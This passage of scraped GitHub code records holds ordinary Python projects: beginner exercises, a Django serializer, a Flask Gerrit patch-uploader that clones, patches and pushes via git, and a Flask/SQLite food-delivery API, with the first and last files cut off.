Root.RootPath\n\n#----------------------------------------------------------------------\ndef GetLocalDatabasePath():\n \"\"\"\"\"\"\n configPath = \"\\\\Configs\\\\DatabaseInfo.cfg\"\n dbCfg = ConfigParser()\n dbCfg.optionxform = str \n dbCfg.read(RootPath + configPath) \n return {\"EquityDataRaw\":dbCfg.get(\"Local\", \"EquityDataRaw\"),\n \"EquityDataRefined\":dbCfg.get(\"Local\", \"EquityDataRefined\")}\n","repo_name":"wusf/MyQunatLib","sub_path":"Tools/GetLocalDatabasePath.py","file_name":"GetLocalDatabasePath.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42260213495","text":"budget = float(input())\nnumber_of_actors = int(input())\nprice_for_clothes_per_actor = float(input())\n\ndecor = budget * 0.1\nif number_of_actors > 150:\n price_for_clothes_per_actor *= 0.9\n\nsum_for_filming = decor + price_for_clothes_per_actor * number_of_actors\n\ndifference = abs(budget - sum_for_filming)\nif sum_for_filming <= budget:\n print(\"Action!\")\n print(f\"Wingard starts filming with {difference:.2f} leva left.\")\nelse:\n print(\"Not enough money!\")\n print(f\"Wingard needs {difference:.2f} leva more.\")\n","repo_name":"zefirnikolov/SoftUni","sub_path":"Python Basics/conditional_statements-exercise/godzilla_vs_kong.py","file_name":"godzilla_vs_kong.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12664572565","text":"import math\nimport datetime\nimport 
collections\nimport statistics\nimport itertools\nfrom collections import Counter\n\n\ndef is_prime(num):\n for i in range(2, int(math.sqrt(num)) + 1):\n if num % i == 0:\n return False\n return True\n\n\ndef input_list():\n ll = list(map(int, input().split(\" \")))\n return ll\n\n\ntc = int(input())\nfor _ in range(tc):\n n, m = map(int, input().split())\n ar = input_list()\n x = Counter(ar)\n c = False\n for i in range(1, m):\n if i not in x:\n print(-1)\n c = True\n break\n if not c:\n print(n - x[m])\n","repo_name":"SKAUL05/cp-snippets","sub_path":"CodeChef/#June_CookOff_MAXMEX.py","file_name":"#June_CookOff_MAXMEX.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"72169100003","text":"soma = 0\ncont = 0\nnota =[ ]\nfor i in range(0,5):\n nota.append(float(input(\"Nota:\")))\n soma = nota[i] + soma\n media = soma/5\nfor j in range(0,5):\n if nota[j] >= media:\n cont+=1\n print(nota[j])\nprint('media:',media)\nprint('qut:',cont)\n\n\n\n\n","repo_name":"ddank0/Python-ex","sub_path":"ex15.py","file_name":"ex15.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4918386702","text":"from rest_framework import serializers \nfrom ...flight.models.calculation import FlightCalculation\nfrom django.db.models import Sum\n\n\nclass FlightCalculationSerializer(serializers.ModelSerializer):\n class Meta:\n model = FlightCalculation\n fields = (\n 'id',\n 'guid',\n 'flight',\n 'from_date',\n 'to_date',\n 'number_of_seat',\n 'total_amount',\n 'prepayment',\n 'remained_amount'\n )\n\n def to_representation(self, instance):\n data = super().to_representation(instance)\n data['remained_amount'] = instance.total_amount - instance.prepayment\n qs = FlightCalculation.objects.filter(flight=instance.flight)\n prepayment_sum = qs.aggregate(prepayment_sum=Sum('prepayment'))['prepayment_sum'] or 0\n remained_amount_sum = qs.aggregate(remained_amount_sum=Sum('remained_amount'))['remained_amount_sum'] or 0\n data['prepayment_sum'] = prepayment_sum\n data['remained_amount_sum'] = remained_amount_sum\n return data\n\n\n\nclass FlightCalculationCreateSerializer(serializers.ModelSerializer):\n class Meta:\n model = FlightCalculation\n fields = (\n 'flight',\n 'from_date',\n 'to_date',\n 'number_of_seat',\n 'total_amount',\n 'prepayment',\n 'remained_amount'\n )\n","repo_name":"akhad97/Parvoz-Express","sub_path":"main/apps/flight/serializer/calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8278863693","text":"#!/usr/bin/env python\nimport subprocess\nimport tempfile\nimport os\nimport re\nimport pipes\nimport binascii\n\nimport jinja2\nfrom flask import Flask, render_template, request, Response, session\nfrom cachelib import FileSystemCache\nfrom flask_mwoauth import MWOAuth\n\nFILE_DIR = os.path.abspath(os.path.split(__file__)[0])\nos.chdir(FILE_DIR)\n\nimport config # noqa, needs to be loaded from local path\n\nGIT_PATH = 'git'\nPATCH_PATH = 'patch'\nRUN_ENV = {'PATH': FILE_DIR + \"/bin\", 'LANG': 'en_US.UTF-8', 'LD_LIBRARY_PATH': FILE_DIR + \"/lib\"}\n\napp = Flask(__name__)\napp.secret_key = config.app_secret_key\n\nmwoauth = MWOAuth(consumer_key=config.oauth_key, consumer_secret=config.oauth_secret)\nmwoauth.handshaker.user_agent = 'Gerrit-Patch-Uploader by 
valhallasw using MWOAuth - http://tools.wmflabs.org/gerrit-patch-uploader'\napp.register_blueprint(mwoauth.bp)\n\ncache = FileSystemCache('cache')\n\n\ndef get_projects():\n projects = cache.get('projects')\n if projects is None:\n p = subprocess.Popen(['ssh', 'gerrit', 'gerrit ls-projects'], stdout=subprocess.PIPE, env=RUN_ENV)\n stdout, stderr = p.communicate()\n projects = stdout.decode(\"utf-8\", \"replace\").strip().split(\"\\n\")\n cache.set('projects', projects)\n return projects\n\n\n@app.route(\"/\")\ndef index():\n author = session.get('author', '')\n return render_template('index.html', projects=get_projects(), username=mwoauth.get_current_user(),\n committer_email=config.committer_email, author=author)\n\n\n@app.route(\"/submit\", methods=[\"POST\"])\ndef submit():\n user = mwoauth.get_current_user(False)\n if not user:\n return \"Must be logged in\"\n\n if request.method != 'POST':\n return \"can only POST\"\n project = request.form['project']\n if project not in get_projects():\n return \"project unknown\"\n committer = request.form['committer']\n if not committer:\n return 'committer not set'\n session['author'] = committer\n message = request.form['message']\n if not message:\n return 'message not set'\n\n if 'fpatch' in request.files:\n patch = request.files['fpatch'].stream.read()\n if not patch:\n patch = request.form['patch'].replace(\"\\r\\n\", \"\\n\").encode('utf-8')\n if not patch:\n return 'patch not set'\n\n note = \"\"\"This commit was uploaded using the Gerrit Patch Uploader [1].\n\nPlease contact the patch author, %s, for questions/improvements.\n\n[1] https://tools.wmflabs.org/gerrit-patch-uploader/\"\"\" % committer\n\n return Response(jinja2.escape(e) for e in apply_and_upload(user, project, committer, message, patch, note))\n\n\ndef prepare_message(message):\n message = message.replace(\"\\r\\n\", \"\\n\")\n message = message.split(\"\\n\")\n\n if not message[-1].startswith('Change-Id: '):\n if not re.match(r\"[a-zA-Z\\-]+: \", message[-1]):\n message.append(\"\")\n message.append('Change-Id: I%s' % binascii.b2a_hex(os.urandom(20)).decode('ascii'))\n\n return \"\\n\".join(message) + \"\\n\"\n\n\ndef apply_and_upload(user, project, committer, message, patch, note=None):\n yield jinja2.Markup(\"Result from uploading patch:
\")\n\n with tempfile.TemporaryDirectory() as tempd:\n def run_command(cmd, *, stdin=None, stdin_name=None):\n yield jinja2.Markup(\"\")\n yield \" \".join(cmd)\n if stdin_name:\n yield \" < \" + stdin_name\n elif stdin:\n yield jinja2.Markup(\"\\n
\")\n yield stdin.decode('utf-8', 'replace')\n yield jinja2.Markup(\"
\")\n\n yield jinja2.Markup(\"
\\n
\")\n p = subprocess.Popen(\n cmd,\n stdin=subprocess.PIPE if stdin else None,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=tempd,\n env=RUN_ENV)\n\n stdout = p.communicate(stdin)[0].replace(b\"\\x1b[K\", b\"\").decode('utf-8', 'replace')\n yield stdout\n yield jinja2.Markup(\"
\")\n\n return p, stdout\n\n try:\n p, _ = yield from run_command(\n [GIT_PATH, 'clone', \"-v\", \"-v\", '--depth=1', 'ssh://gerrit/' + project, tempd])\n if p.returncode != 0:\n raise Exception(\"Clone failed\")\n\n p, stdout = yield from run_command(\n [GIT_PATH, 'rev-parse', '--abbrev-ref', 'HEAD'])\n if p.returncode != 0:\n raise Exception(\"Could not determine branch\")\n\n branch = stdout.strip()\n\n p, _ = yield from run_command(\n [GIT_PATH, 'config', 'user.name', '[[mw:User:%s]]' % user])\n if p.returncode != 0:\n raise Exception(\"Git Config failed (should never happen)!\")\n\n p, _ = yield from run_command(\n [GIT_PATH, 'config', 'user.email', config.committer_email])\n if p.returncode != 0:\n raise Exception(\"Git Config failed (should never happen)!\")\n\n patch_commands = [\n [GIT_PATH, \"apply\"],\n [PATCH_PATH, \"--no-backup-if-mismatch\", \"-p0\", \"-u\"],\n [PATCH_PATH, \"--no-backup-if-mismatch\", \"-p1\", \"-u\"],\n ]\n for pc in patch_commands:\n p, _ = yield from run_command(pc, stdin=patch, stdin_name=\"patch\")\n if p.returncode == 0:\n break\n\n if p.returncode != 0:\n raise Exception(\n \"Patch failed (is your patch in unified diff format, and does it patch apply cleanly to master?)\"\n )\n\n p, _ = yield from run_command(\n [GIT_PATH, \"add\", \"-A\"])\n if p.returncode != 0:\n raise Exception(\"Git add failed (were no files changed?)\")\n\n message = prepare_message(message)\n p, _ = yield from run_command(\n [GIT_PATH, \"commit\", \"-a\", \"--author=\" + committer, \"-F\", \"-\"], stdin=message.encode('utf-8'))\n if p.returncode != 0:\n raise Exception(\"Commit failed (incorrect format used for author?)\")\n\n p, stdout = yield from run_command(\n [GIT_PATH, \"rev-list\", \"-1\", \"HEAD\"])\n if p.returncode != 0:\n raise Exception(\"Could not determine commit SHA1\")\n sha1 = stdout.strip()\n\n p, pushresult = yield from run_command(\n [GIT_PATH, \"push\", \"origin\", \"HEAD:refs/for/%s\" % branch])\n if p.returncode != 0:\n raise Exception(\"Push failed\")\n\n yield jinja2.Markup(\"
\")\n\n yield \"Uploaded patches:\"\n yield jinja2.Markup(\"\")\n\n if note:\n yield jinja2.Markup(\"
Submitting note: %s
\") % note\n note = pipes.quote(note)\n sha1 = pipes.quote(sha1)\n p = subprocess.Popen(\n [\"ssh\", \"gerrit\", \"gerrit review %s -m %s\" % (sha1, note)],\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,\n cwd=tempd,\n env=RUN_ENV)\n p.communicate()\n if p.returncode != 0:\n raise Exception(\"Note could not be submitted correctly\")\n\n if len(patches) == 1:\n yield \"Automatically redirecting in 5 seconds...\"\n yield jinja2.Markup('') % (patch,)\n except Exception as e:\n yield jinja2.Markup(\"\")\n yield jinja2.Markup(\"Upload failed
\")\n yield jinja2.Markup(\"Reason: %s (check log above for details)\") % e\n\n import traceback\n traceback.print_exc()\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"valhallasw/gerrit-patch-uploader","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"71865964322","text":"from bottle import response, redirect\r\nfrom functools import wraps\r\n\r\ndef login_required(f):\r\n @wraps(f)\r\n def wrapper(session, db=None):\r\n params={\r\n 'session': session\r\n }\r\n \r\n if db:\r\n params['db'] = db\r\n\r\n if(session['user']):\r\n return f(**params)\r\n else:\r\n response.flash({'message': 'Usuário não esta autorizado a acessa essa requisição.', 'code': 'danger'})\r\n return redirect('login')\r\n\r\n return wrapper","repo_name":"janerbastos/bottle-app","sub_path":"core/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72312237280","text":"from django import template\nfrom sellmo import modules\nfrom sellmo.core import indexing\n\nfrom classytags.core import Tag, Options\nfrom classytags.arguments import Argument\n\n\nregister = template.Library()\n\n\nclass CategoryBrandsTag(Tag):\n name = 'categorybrands'\n options = Options(\n Argument('category'),\n 'as',\n Argument('varname', default='brands', required=False, resolve=False),\n blocks=[\n ('endcategorybrands', 'nodelist')\n ],\n )\n\n def get_brands(self, category):\n index = indexing.indexer.get_index('product')\n if index.has_field('categories') and index.has_field('attr_brand'):\n brands = index.search().filter(categories__in=category.get_descendants(include_self=True))\n brands = brands.with_fields('attr_brand')\n return [obj['attr_brand'] for obj in brands.values()]\n else:\n return []\n\n def render_tag(self, context, category, varname, nodelist):\n context.push()\n context[varname] = self.get_brands(category)\n output = nodelist.render(context)\n context.pop()\n return output\n\n\nregister.tag(CategoryBrandsTag)\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/adaptivdesign/django-sellmo/skeleton/brand/templatetags/brand.py","file_name":"brand.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2497507685","text":"#Without argpartition Script with all features used took 4 days but with argpartition it executes in 3 hours on Core 2 Duo\n\n#Best Value of K\n\n# Prime Nearest Number(Number of Features)^1/2 With K as a random guess...\n\n#This is Sample Script\nimport pandas as pd\nimport os\nimport numpy as np\n\nos.system(\"ls ../input\")\n\ndata = pd.read_csv(\"../input/train.csv\")\ndata.describe()\ndata.columns\n\n\nX=np.asarray(data.ix[:,1:-1].dropna(),dtype=np.float32)\nprint (X.shape)\nY=np.asarray(data.ix[:,-1])\nprint (Y, Y.shape, len(np.unique(Y))) # so we have 9 classes...\n\n#print(\"Training set has {0[0]} rows and {0[1]} columns\".format(train.shape))\n\n#print(train.head())\n#datatest=pd.read_csv('../input/test.csv')\n#ids=np.array(datatest['id'])\n#Xtest=np.array(datatest.ix[:,1:].values,dtype=np.float32)\n\n#feat=np.arange(X.shape[1])\n#knn1=KNearestNeighbor(11)# Prime 93^1/2 With K as a random guess...\n#knn1.train(X[:,feat],Y)\n#pclassesNewWith11=knn1.predict(Xtest[:,feat])\n\n# value of K if 
used 11 or 7 the best possible accuracy with KNN can be achieved. ","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/otto-group-product-classification-challenge/Sandeep Charan/knn-argpartition-and-value-of-k.py","file_name":"knn-argpartition-and-value-of-k.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"22854023443","text":"import os\nimport urllib\nimport uuid\n\nimport requests\nfrom flask import Flask, request\nfrom flask_cors import CORS\nimport json\nimport random\nimport sqlite3\nimport time\n\napp = Flask(__name__)\nCORS(app)\n\nUSER_ID = '1'\n\n\ndef get_cursor():\n connection = sqlite3.connect(\"database.db\")\n c = connection.cursor()\n return c\n\n\ndef init_db():\n c = get_cursor()\n c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS meals(\n id integer PRIMARY KEY AUTOINCREMENT NOT NULL,\n title text,\n available int,\n picture text,\n price real,\n category integer\n )\n \"\"\")\n\n c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS promocodes(\n id integer PRIMARY KEY,\n code text,\n discount real\n )\n \"\"\")\n\n c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS users(\n id integer PRIMARY KEY,\n promocode text,\n name text,\n address text,\n phone text,\n orders text\n )\n \"\"\")\n\n c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS promotions(\n id integer PRIMARY KEY,\n title text,\n description text\n )\n \"\"\")\n\n c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS orders(\n id text PRIMARY KEY,\n ordered real,\n meals text,\n summ real,\n status text,\n address text,\n user_id int \n )\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO promocodes VALUES (1, \"stepik\", 15.0)\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO promocodes VALUES (2, \"delivery\", 10.0)\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO users VALUES (1, null, \"Mary Swan\", \"Saint Petersburg\", null, null)\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO promotions VALUES (1, \"Get discount if you study with Stepik\", \"Discount 15% with STEPIK promocode\")\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO promotions VALUES (2, \"Get you discount if you love to eat\", \"Discount 10% with DELIVERY promocode\")\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO promotions VALUES (3, \"Get you discount if you love to drink\", \"Discount 5% for all drinks\")\n \"\"\")\n\n c.connection.commit()\n c.connection.close()\n\n\ndef fill_database():\n api_key = \"7ee1cc6c2e4d5ecf10b9ab99b16c7e16\"\n key_words = \"cheese\"\n page = 1\n params = {\"key\": api_key, \"q\": key_words, \"page\": page}\n url_string = \"https://www.food2fork.com/api/search?\" + urllib.parse.urlencode(params)\n r = requests.get(url_string)\n data = r.json()\n c = get_cursor()\n for page in range(1, 5):\n for item in data['recipes']:\n c.execute(\"\"\"\n INSERT INTO meals (title, available, picture, price, category) VALUES (?, ?, ?, ?, ?)\n \"\"\", [\n item['title'],\n 1,\n item['image_url'],\n item['social_rank'] + random.randint(0, 100),\n 1\n ])\n c.connection.commit()\n c.connection.close()\n\n\nif not os.path.exists(\"database.db\"):\n init_db()\n fill_database()\n\n\ndef read_file(filename):\n opened_file = open(filename, 'r')\n data = json.loads(opened_file.read())\n opened_file.close()\n return data\n\n\ndef write_file(filename, data):\n opened_file = open(filename, 'w')\n opened_file.write(json.dumps(data))\n opened_file.close()\n\n\ndef fire_discount(price, discount):\n return price * (1.0 - discount / 
100)\n\n\n@app.route(\"/alive\")\ndef alive():\n data = read_file('config.json')\n return json.dumps({\"alive\": data['alive']})\n\n\n@app.route(\"/workhours\")\ndef workhours():\n data = read_file('config.json')\n return json.dumps(data['workhours'])\n\n\n@app.route(\"/promotion\")\ndef promotion():\n promotion_number = random.randint(1, 3)\n\n c = get_cursor()\n c.execute(\"\"\"\n SELECT title, description FROM promotions WHERE id = ?\n \"\"\", (promotion_number,))\n title, description = c.fetchone()\n return json.dumps({\"title\": title, \"description\": description})\n\n\n@app.route(\"/promocode/\")\ndef promo(code):\n c = get_cursor()\n c.execute(\"\"\"\n SELECT * FROM promocodes WHERE code = ?\n \"\"\", (code,))\n\n result = c.fetchone()\n if result is None:\n return \"Invalid code\", 404\n\n promo_id, promo_code, promo_discount = result\n c.execute(\"\"\"\n UPDATE users\n SET promocode = ?\n WHERE id = ?\n \"\"\", (promo_code, int(USER_ID)))\n c.connection.commit()\n c.connection.close()\n return str(promo_discount), 200\n\n\n@app.route(\"/meals\")\ndef meals_route():\n c = get_cursor()\n c.execute(\"\"\"\n SELECT discount FROM promocodes\n WHERE code = (\n SELECT promocode FROM users\n WHERE id = ?\n )\n \"\"\", (int(USER_ID),))\n result = c.fetchone()\n\n discount = 0\n if result is not None:\n discount = result[0]\n\n meals = []\n\n for meals_info in c.execute(\"SELECT * FROM meals\"):\n meals_id, title, available, picture, price, category = meals_info\n meals.append({\n 'id': meals_id,\n 'title': title,\n 'available': bool(available),\n 'picture': picture,\n 'price': fire_discount(price, discount),\n 'category': category\n })\n\n return json.dumps(meals)\n\n\n@app.route(\"/orders\", methods=[\"GET\", \"POST\"])\ndef orders():\n c = get_cursor()\n\n if request.method == \"GET\":\n user_orders = []\n for order in c.execute(\"\"\"SELECT id, ordered, meals, summ, status, address FROM orders WHERE user_id = ?\"\"\",\n (int(USER_ID),)):\n order_id, ordered, order_meals, summ, status, address = order\n user_orders.append({\n 'id': order_id,\n 'ordered': ordered,\n 'meals': json.loads(order_meals),\n 'summ': summ,\n 'status': status,\n 'address': address\n })\n return json.dumps(user_orders)\n elif request.method == \"POST\":\n raw_data = request.data.decode(\"utf-8\")\n data = json.loads(raw_data)\n\n discount = 0\n\n key_exists = 'promocode' in data\n if key_exists:\n c.execute(\"\"\"\n SELECT discount FROM promocodes\n WHERE code = ?\n \"\"\", (data['promocode'],))\n result = c.fetchone()\n\n if result is not None: # лишняя проверка, тк если промокода нет, то в словаре нет ключа 'promocode'\n discount = result[0]\n\n summ = 0.0\n for user_meal_id in data['meals']:\n c.execute(\"\"\"SELECT price FROM meals WHERE id == ?\"\"\", (user_meal_id,))\n price = c.fetchone()[0]\n summ += fire_discount(price, discount)\n\n new_order_id = str(uuid.uuid4())\n\n address = c.execute(\"\"\"\n SELECT address FROM users\n WHERE id == ?\n \"\"\", (USER_ID))\n\n ordered = time.time() + random.randint(1800, 7200)\n new_order = [new_order_id, ordered, str(data['meals']), summ, \"ACCEPTED\", str(address), int(USER_ID)]\n\n c.execute(\"\"\"INSERT INTO orders VALUES (?, ?, ?, ?, ?, ?, ?)\"\"\", new_order)\n\n c.connection.commit()\n c.connection.close()\n\n return json.dumps({'order_id': new_order_id})\n\n\n@app.route(\"/order/\", methods=[\"DELETE\"])\ndef one_order(order_id):\n c = get_cursor()\n if c.execute(\"\"\"SELECT * FROM orders WHERE status == \"ACCEPTED\" AND id == ?\"\"\", (order_id,)).rowcount > 
0:\n c.execute(\"\"\"\n UPDATE orders\n SET status = \"CANCELLED\"\n WHERE id = ?\n \"\"\", (order_id,))\n c.connection.commit()\n c.connection.close()\n return \"True\"\n return \"False\", 404\n\n\n@app.route(\"/activeorder\", methods=[\"GET\", \"DELETE\"])\ndef activeorder():\n c = get_cursor()\n\n if request.method == \"GET\":\n return find_active_order(c)\n elif request.method == \"DELETE\":\n if find_active_order(c)[0] is not \"\":\n c.execute(\"\"\"\n UPDATE orders\n SET status = \"CANCELLED\"\n WHERE status == \"ACCEPTED\" AND user_id == ?\n \"\"\", (int(USER_ID),))\n c.connection.commit()\n c.connection.close()\n return \"True\"\n return \"False\", 404\n\n\n@app.route(\"/profile\", methods=[\"GET\", \"PATCH\"])\ndef profile_route():\n c = get_cursor()\n\n if request.method == \"GET\":\n c.execute(\"\"\"\n SELECT name, address, phone, orders FROM users\n WHERE id == ?\n \"\"\", (int(USER_ID),))\n name, address, phone, orders = c.fetchone()\n return json.dumps({\"name\": name, \"address\": address, \"phone\": phone, \"orders\": orders})\n elif request.method == \"PATCH\":\n raw_data = request.data.decode(\"utf-8\")\n data = json.loads(raw_data)\n c.execute(\"\"\"\n UPDATE users\n SET name = ?, address = ?, phone = ?\n WHERE id == ?\n \"\"\", (data['name'], data['address'], data['phone'], USER_ID))\n c.connection.commit()\n c.connection.close()\n return \"True\"\n else:\n return \"False\"\n\n\n@app.route(\"/delivers\")\ndef delivers():\n c = get_cursor()\n response = find_active_order(c)\n if response[0] is not \"\":\n return json.dumps({\"time\": int(json.loads(response)['ordered'])})\n return \"\", 404\n\n\ndef find_active_order(c):\n c.execute(\"\"\"\n SELECT id, ordered, meals, summ, status, address FROM orders\n WHERE status == \"ACCEPTED\" AND user_id == ?\n \"\"\", (int(USER_ID),))\n result = c.fetchone()\n if result is not None:\n order_id, ordered, meals, summ, status, address = result\n return json.dumps({\n 'id': order_id,\n 'ordered': ordered,\n 'meals': json.loads(meals),\n 'summ': summ,\n 'status': status,\n 'address': address\n })\n return \"\", 404\n\n\napp.run(\"0.0.0.0\", 9000)\n","repo_name":"MariaLebedeva/stepik-course-delivery-backend","sub_path":"flasks/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23503865702","text":"from django.db import models\n\n# Create your models here.\n\nMAX_UA_LENGTH = 192\n\nclass Report(models.Model):\n \n type = models.CharField(max_length=64, blank=True, null=True)\n time = models.DateTimeField(db_index=True)\n version = models.IntegerField(blank=True, null=True)\n jsondata = models.TextField(blank=True, null=True)\n comments = models.CharField(max_length=512, blank=True, null=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n\n class Meta:\n db_table = 'report'\n ordering = ['time', 'gmt_create']\n get_latest_by = \"time\" # Entry.objects.latest()\n \nclass OperType(models.Model):\n \n name = models.CharField(max_length=128, null=True, blank=True)\n path = models.CharField(max_length=128, db_index=True)\n method = models.CharField(max_length=16, db_index=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n \n def __unicode__(self):\n \n return u'%s %s' % (self.method, self.path)\n \n class Meta:\n unique_together = ('path', 
'method')\n db_table = 'stats_opertype'\n ordering = ['gmt_create']\n\n\nclass Oper(models.Model):\n \n user_id = models.IntegerField(null=True, blank=True, db_index=True)\n oper_type_id = models.IntegerField(db_index=True)\n ua_id = models.IntegerField(db_index=True)\n remote_ip = models.CharField(max_length=128, null=True, blank=True)\n meta = models.TextField(blank=True, null=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n \n def __unicode__(self):\n \n return u'id:%s performs action:%d' % (self.user_id, self.oper_type_id)\n\n class Meta:\n db_table = 'stats_oper'\n ordering = ['gmt_create']\n\nclass OperRaw(models.Model):\n \n user_id = models.IntegerField(null=True, blank=True, db_index=True)\n oper_id = models.IntegerField(db_index=True)\n request = models.TextField(blank=True, null=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n \n def __unicode__(self):\n \n return u'%d' % self.oper_id\n \n class Meta:\n db_table = 'stats_operraw'\n ordering = ['gmt_create']\n\nclass OperObject(models.Model):\n \n user_id = models.IntegerField(null=True, blank=True, db_index=True)\n oper_id = models.IntegerField(db_index=True)\n object_type = models.CharField(max_length=32, db_index=True)\n object_key = models.CharField(max_length=4096, blank=True, null=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n \n def __unicode__(self):\n \n return u'on type:%d id:%s' % (self.object_type, self.object_key)\n\n class Meta:\n db_table = 'stats_operobject'\n ordering = ['gmt_create']\n\nclass UA(models.Model):\n \n platform = models.CharField(max_length=32, db_index=True)\n os_version = models.CharField(max_length=32, db_index=True)\n majorver = models.CharField(max_length=32, db_index=True)\n minorver = models.CharField(max_length=32, db_index=True)\n browser = models.CharField(max_length=32, db_index=True)\n is_crawler = models.BooleanField()\n ua_string = models.CharField(max_length=MAX_UA_LENGTH)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n \n def __unicode__(self):\n \n return u'%s' % self.ua_string\n \n class Meta:\n unique_together = ('ua_string',)\n db_table = 'stats_ua'\n ordering = ['gmt_create']\n\nclass Aggregation(models.Model):\n\n type = models.CharField(max_length=64, db_index=True)\n time = models.DateTimeField(db_index=True)\n content = models.TextField(blank=True, null=True)\n comments = models.CharField(max_length=512)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n\n class Meta:\n db_table = 'aggregation'\n ordering = ['time', 'gmt_create']\n get_latest_by = \"time\" # Entry.objects.latest()\n\nclass Notice(models.Model):\n\n title = models.TextField(blank=True, null=True)\n content = models.TextField(blank=True, null=True)\n group = models.IntegerField(null=True)\n users = models.TextField(blank=True, null=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n\n class Meta:\n db_table = 'notice'\n ordering = ['gmt_create']\n get_latest_by = \"gmt_create\" # 
Entry.objects.latest()","repo_name":"liubida/SohukanHealth","sub_path":"SohukanHealth/statistics/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"15965990675","text":"T = int(input())\n\nclass Node():\n def __init__(self, node, cnt=None):\n self.node = node\n self.cnt = cnt\n\ndef bfs(graph, start, cnt):\n global result\n visit.append(start)\n queue = [Node(start, cnt)]\n while queue:\n current = queue.pop(0)\n if current.node == g:\n result = current.cnt\n break\n for i in graph[current.node]:\n if i not in visit:\n new_cnt = current.cnt + 1\n queue.append(Node(i, new_cnt))\n visit.append(i)\n\nfor test_case in range(1,T+1):\n graph = dict()\n v, e = list(map(int, input().split()))\n result = 0\n visit = []\n\n #graph initialize\n for i in range(v):\n graph[str(i+1)] = []\n\n #Links alocated by input value\n for _ in range(e):\n key, val = input().split()\n graph[key].append(val)\n graph[val].append(key)\n\n s, g = input().split()\n\n bfs(graph, s, 0)\n print(\"#{} {}\".format(test_case, result))\n \n","repo_name":"Youngjae-park/Study-Algorithm","sub_path":"node_distance.py","file_name":"node_distance.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12055707212","text":"import pyaudio\nimport audioop\nimport numpy as np\nimport time\n# initialise pyaudio get channels and rate automaticly, also set chunk size\npa = pyaudio.PyAudio()\nCHUNK = 16\nRATE = int(pa.get_device_info_by_index(2).get('defaultSampleRate'))\nCHANNELS = int(pa.get_device_info_by_index(2).get('maxInputChannels'))\nstream = pa.open(format = pyaudio.paInt16,\n channels = CHANNELS,\n rate = RATE,\n input = True,\n frames_per_buffer = 16,\n input_device_index=2)\ndef readAudio():\n audioLst = []\n # calculate the root mean square of every chunk and put it in a list. 
